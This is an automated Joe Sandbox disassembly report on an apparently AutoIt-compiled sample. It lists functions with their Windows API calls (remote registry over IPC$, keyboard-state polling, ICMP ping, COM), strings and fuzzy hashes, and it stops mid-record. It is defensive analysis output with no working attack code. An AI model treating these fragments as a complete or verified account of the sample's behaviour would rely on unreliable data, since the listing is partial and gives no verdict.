LoadStringW.USER32(00000000,?,0016F7F8,00000001), ref: 00189745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00189866

Strings

Line %d:, xrefs: 001897A0
%s (%d) : ==> %s: %s %s, xrefs: 0018984A
^ ERROR, xrefs: 001897FB
Error: , xrefs: 0018981D
Line %d (File "%s"):, xrefs: 0018978F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 3ea2d3072c87150b6cc60fcb05a53c1f652bd16b98b55d4682d03fa540e076df
Instruction ID: 852b6f1a972b42573d28a345665ca15a28abf121f60dcbd8114bf3aa33ccf74d
Opcode Fuzzy Hash: 3ea2d3072c87150b6cc60fcb05a53c1f652bd16b98b55d4682d03fa540e076df
Instruction Fuzzy Hash: 79412B7290021DAACB04FBE5EE86DEEB778AF25340F540465F50572092EB356F58CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001806DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001807A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001807BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001807DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00180804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0018082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00180837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0018083C

Strings

\CLSID, xrefs: 00180724
\IPC$, xrefs: 00180784
SOFTWARE\Classes\, xrefs: 0018070E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: d2bd497b8812e61778f16d9be6f873dcc6d65b4d461292409cdd99e5602a8d2d
Instruction ID: d486cc5d323aac52047db369c3d3c3e78a44c590f03f04122491c6502d496fb2
Opcode Fuzzy Hash: d2bd497b8812e61778f16d9be6f873dcc6d65b4d461292409cdd99e5602a8d2d
Instruction Fuzzy Hash: 87411672C1022DABCF11EBA4EC858EDB778BF18354F444129F911A71A1EB309E58CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001A3C5C
CoInitialize.OLE32(00000000), ref: 001A3C8A
CoUninitialize.OLE32 ref: 001A3C94
_wcslen.LIBCMT ref: 001A3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 001A3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 001A3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001A3F0E
CoGetObject.OLE32(?,00000000,001BFB98,?), ref: 001A3F2D
SetErrorMode.KERNEL32(00000000), ref: 001A3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001A3FC4
VariantClear.OLEAUT32(?), ref: 001A3FD8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9cc2072459c19ade325d509b8cedc017969be2050af18f16d476edb30f622816
Instruction ID: d04295e8185fd4ae067f7f8b30da6672b2b18c73051aa318c6849be6b6001378
Opcode Fuzzy Hash: 9cc2072459c19ade325d509b8cedc017969be2050af18f16d476edb30f622816
Instruction Fuzzy Hash: C9C144756083059FC700DF68C884A2BBBE9FF8A744F10491DF99A9B251D730EE46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00197A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00197AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00197B8F
SHGetDesktopFolder.SHELL32(?), ref: 00197BA3
CoCreateInstance.OLE32(001BFD08,00000000,00000001,001E6E6C,?), ref: 00197BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00197C74
CoTaskMemFree.OLE32(?,?), ref: 00197CCC
SHBrowseForFolderW.SHELL32(?), ref: 00197D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00197D7A
CoTaskMemFree.OLE32(00000000), ref: 00197D81
CoTaskMemFree.OLE32(00000000), ref: 00197DD6
CoUninitialize.OLE32 ref: 00197DDC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 22267d7026b047efa680713507f80288f0745296cd1917c95ee3bf7b8693201e
Instruction ID: f573b146cee5d35099b479d8e0bbaab9dc43592275971fc33904e3386aa411aa
Opcode Fuzzy Hash: 22267d7026b047efa680713507f80288f0745296cd1917c95ee3bf7b8693201e
Instruction Fuzzy Hash: E6C12A75A04119AFCB14DFA4D884DAEBBF9FF48304B148599F81ADB661D730EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001B5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B5515
CharNextW.USER32(00000158), ref: 001B5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001B5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001B559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B55AC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 8e69883e3fef597238d5e49a3cc53a3479a42db48a4d4cf9261586443b2acc07
Instruction ID: ac6baf5dfae291ac49f7948f54455374fd5df975882bb57c3b9db9cccb7cbd7f
Opcode Fuzzy Hash: 8e69883e3fef597238d5e49a3cc53a3479a42db48a4d4cf9261586443b2acc07
Instruction Fuzzy Hash: 5B618C30900608EFDF209F94CC84EFE7BBAEF09765F104145F925AB290D7749A81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0017FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0017FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0017FB08
VariantInit.OLEAUT32(?), ref: 0017FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0017FB3A
VariantCopy.OLEAUT32(?,?), ref: 0017FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0017FBA1
VariantClear.OLEAUT32(?), ref: 0017FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0017FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0017FBCC
VariantClear.OLEAUT32(?), ref: 0017FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0017FBE9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 41802e99fb8f9118cf9d68a33746474cf21bbeb56f3ac7eafb9a065a532d6f82
Instruction ID: 4d2616eb613784395c456c7d6af120fa82c5da6e345d48de0b8b91cf488ce214
Opcode Fuzzy Hash: 41802e99fb8f9118cf9d68a33746474cf21bbeb56f3ac7eafb9a065a532d6f82
Instruction Fuzzy Hash: E4415F35A00219DFCB00DF68D8549EEBBB9EF58344F008169E959A7661CB30AA46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00189C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00189CA1
GetAsyncKeyState.USER32(000000A0), ref: 00189D22
GetKeyState.USER32(000000A0), ref: 00189D3D
GetAsyncKeyState.USER32(000000A1), ref: 00189D57
GetKeyState.USER32(000000A1), ref: 00189D6C
GetAsyncKeyState.USER32(00000011), ref: 00189D84
GetKeyState.USER32(00000011), ref: 00189D96
GetAsyncKeyState.USER32(00000012), ref: 00189DAE
GetKeyState.USER32(00000012), ref: 00189DC0
GetAsyncKeyState.USER32(0000005B), ref: 00189DD8
GetKeyState.USER32(0000005B), ref: 00189DEA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 5ce415fb6c268b29dafdea8bedb34cdebcedbc11a8afa5a67c145b92d296ddd5
Instruction ID: f17a465ccb29c29fd065cf1e9030ab94739100574da601a8c93bec63582b942f
Opcode Fuzzy Hash: 5ce415fb6c268b29dafdea8bedb34cdebcedbc11a8afa5a67c145b92d296ddd5
Instruction Fuzzy Hash: 2541A8346047CA6DFF31B6A4C8443B5BEE06F11344F0C815ADAC6566C2DBA59BC8CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 001A055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001A05BC
inet_addr.WSOCK32(?), ref: 001A061C
gethostbyname.WSOCK32(?), ref: 001A0628
IcmpCreateFile.IPHLPAPI ref: 001A0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001A06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001A06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 001A07B9
WSACleanup.WSOCK32 ref: 001A07BF

Strings

Ping, xrefs: 001A0676

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f4515bac6d024fbfc689294485568241757f4830981be79a2fcdb2891dd0f00f
Instruction ID: 84a89c5156b86da8a4850dcb4b16cfeec50bd694ae807e8a1460e26bd478594f
Opcode Fuzzy Hash: f4515bac6d024fbfc689294485568241757f4830981be79a2fcdb2891dd0f00f
Instruction Fuzzy Hash: C691B0795042019FD321CF19D888F1ABBE0AF49318F1585A9F4A99B7A2C730FD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001A8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 001A8CF3

Part of subcall function 00188E54: _wcslen.LIBCMT ref: 00188E77

_wcslen.LIBCMT ref: 001A8D4E
_wcslen.LIBCMT ref: 001A8D9C
_wcslen.LIBCMT ref: 001A8DDC
_wcslen.LIBCMT ref: 001A8E6E

Strings

stdcall, xrefs: 001A8DD6, 001A8DDB
none, xrefs: 001A8E65, 001A8E6A
cdecl, xrefs: 001A8D48, 001A8D4D
winapi, xrefs: 001A8D96, 001A8D9B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d4f34131ac90ffacae30199cf3840cc7170984805e821ba71f7a5d810c6c4fc2
Instruction ID: c37522272701cf2287ca63ec43299ecc1c75a8e9a5324de7c06932eeb0bb9012
Opcode Fuzzy Hash: d4f34131ac90ffacae30199cf3840cc7170984805e821ba71f7a5d810c6c4fc2
Instruction Fuzzy Hash: DF519035A00516DBCF14DFACC9509BEB7A5BF66724B214229E426E72C4EB30DD40C790

Uniqueness

Uniqueness Score: -1.00%

Function 001A372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 001A3774
CoUninitialize.OLE32 ref: 001A377F
CoCreateInstance.OLE32(?,00000000,00000017,001BFB78,?), ref: 001A37D9
IIDFromString.OLE32(?,?), ref: 001A384C
VariantInit.OLEAUT32(?), ref: 001A38E4
VariantClear.OLEAUT32(?), ref: 001A3936

Strings

Invalid parameter, xrefs: 001A3865
Failed to create object, xrefs: 001A37E4, 001A389A
NULL Pointer assignment, xrefs: 001A381E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: bce225831fce39d6e43455477221bea49c0c0102e0809247b5a49ba98e79286f
Instruction ID: 7daff0098cba165ff521b87dc9f86295780768710f9ac69cf962dbacf05b8576
Opcode Fuzzy Hash: bce225831fce39d6e43455477221bea49c0c0102e0809247b5a49ba98e79286f
Instruction Fuzzy Hash: 5F61DF74608301AFD311DF54D888F6ABBE8EF4A710F10090DF9959B291C774EE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00193388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001933CF

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001933F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00193504
^ ERROR , xrefs: 0019349E
"%s" (%d) : ==> %s:, xrefs: 00193522
Error: , xrefs: 001934D1
Incorrect parameters to object property !, xrefs: 001934AB
Line %d (File "%s"):, xrefs: 00193443, 0019345C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 2f558e1d56f9d6b7693da22af93323052370ca226c85aa104a25c332c957228f
Instruction ID: 21007245480dff81b311097c342dd096cc3cb1793e833d11dd2394987115a3bd
Opcode Fuzzy Hash: 2f558e1d56f9d6b7693da22af93323052370ca226c85aa104a25c332c957228f
Instruction Fuzzy Hash: E9518C72D00219AADF15EBA0ED42EEEB778BF28340F144065F41572092EB356FA8DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0018B5FC
_wcslen.LIBCMT ref: 0018B608
_wcslen.LIBCMT ref: 0018B64D
_wcslen.LIBCMT ref: 0018B68C
_wcslen.LIBCMT ref: 0018B6C7

Strings

REMOVE, xrefs: 0018B602, 0018B607
EXISTS, xrefs: 0018B686, 0018B68B
KEYS, xrefs: 0018B647, 0018B64C
APPEND, xrefs: 0018B6C1, 0018B6C6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: a290dab3a45d0fd2eb83715ddcc0565a68e77f094c961789711cbabf0941c1ae
Instruction ID: 32c6d872e6894548eedea47de4e5128819d8025ea9be2bbe73fc82f76d4a337c
Opcode Fuzzy Hash: a290dab3a45d0fd2eb83715ddcc0565a68e77f094c961789711cbabf0941c1ae
Instruction Fuzzy Hash: 1141D432A081269BCB207F7DC9D05BE77A5AF74794B754129E425DB284F731CE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00195393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001953A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00195416
GetLastError.KERNEL32 ref: 00195420
SetErrorMode.KERNEL32(00000000,READY), ref: 001954A7

Strings

UNKNOWN, xrefs: 00195444
NOTREADY, xrefs: 0019544B
INVALID, xrefs: 00195459
READONLY, xrefs: 00195452
READY, xrefs: 00195460, 00195468

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 38e823f706fad3ed2e804bf6e8ae01782078b08043f37d4fb716f7482f04d888
Instruction ID: e8dfd460d3b1381fd381bd6b1db37045b01bdc9156e192be7186d59a9d78df7a
Opcode Fuzzy Hash: 38e823f706fad3ed2e804bf6e8ae01782078b08043f37d4fb716f7482f04d888
Instruction Fuzzy Hash: 9131D235A00604DFCB52DF68D888AAEBBF5FF54345F548065E405EB292E730ED82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 001B3C79
SetMenu.USER32(?,00000000), ref: 001B3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B3D10
IsMenu.USER32(?), ref: 001B3D24
CreatePopupMenu.USER32 ref: 001B3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001B3D5B
DrawMenuBar.USER32 ref: 001B3D63

Strings

0, xrefs: 001B3C54
F, xrefs: 001B3D4E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: d05a62472e9df68414654aeb59bb344e4bad9911a2f4dfb5a22a6f34a9a4c432
Instruction ID: ed9ed9d76d9ec3c6e073b711ea97d91e79de71fc8c35fd345a35ffffb5cf9102
Opcode Fuzzy Hash: d05a62472e9df68414654aeb59bb344e4bad9911a2f4dfb5a22a6f34a9a4c432
Instruction Fuzzy Hash: 17416B79A01209EFDB24CFA4D844EEA7BB5FF49350F140129F956A7360D770AA60CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001B3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001B3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001B3AA0
GetWindowLongW.USER32(?,000000F0), ref: 001B3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001B3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001B3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001B3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001B3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001B3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001B3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001B3C13

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
